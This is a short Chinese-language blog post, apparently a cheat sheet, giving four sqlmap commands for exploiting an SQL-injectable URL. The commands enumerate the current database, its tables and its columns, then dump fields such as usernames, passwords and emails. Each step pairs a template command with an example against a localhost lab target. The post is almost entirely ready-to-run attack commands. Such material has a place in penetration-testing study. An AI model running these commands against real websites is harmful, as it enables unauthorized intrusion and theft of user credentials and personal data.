经典sqlmap命令

Posted on
Symbols count in article: 649 | Reading time ≈ 0:01

0x01 查看当前数据库,得到数据库名字

sqlmap.py -u “存在注入url” –current-db

python sqlmap.py -u “http://127.0.0.1:65412/?id=2“ –current-db

0x02 查看tables,得到指定数据库的表名字

python sqlmap.py -u “存在注入url” -D “当前数据库名” –tables //解释说明:-D是指定数据库名称

python sqlmap.py -u “http://127.0.0.1:65412/?id=2“ –tables

0x03 查看columns,得到指定数据库,指定表的列名字

sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” –columns

python sqlmap.py -u “http://127.0.0.1:65412/?id=2“ -T “users” –columns

0x04 根据上面得到的columns查看具体字段

sqlmap.py -u “存在注入url ” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “username,password,email” –dump

python sqlmap.py -u “http://127.0.0.1:65412/?id=2“ -T “users” -C “password” –dump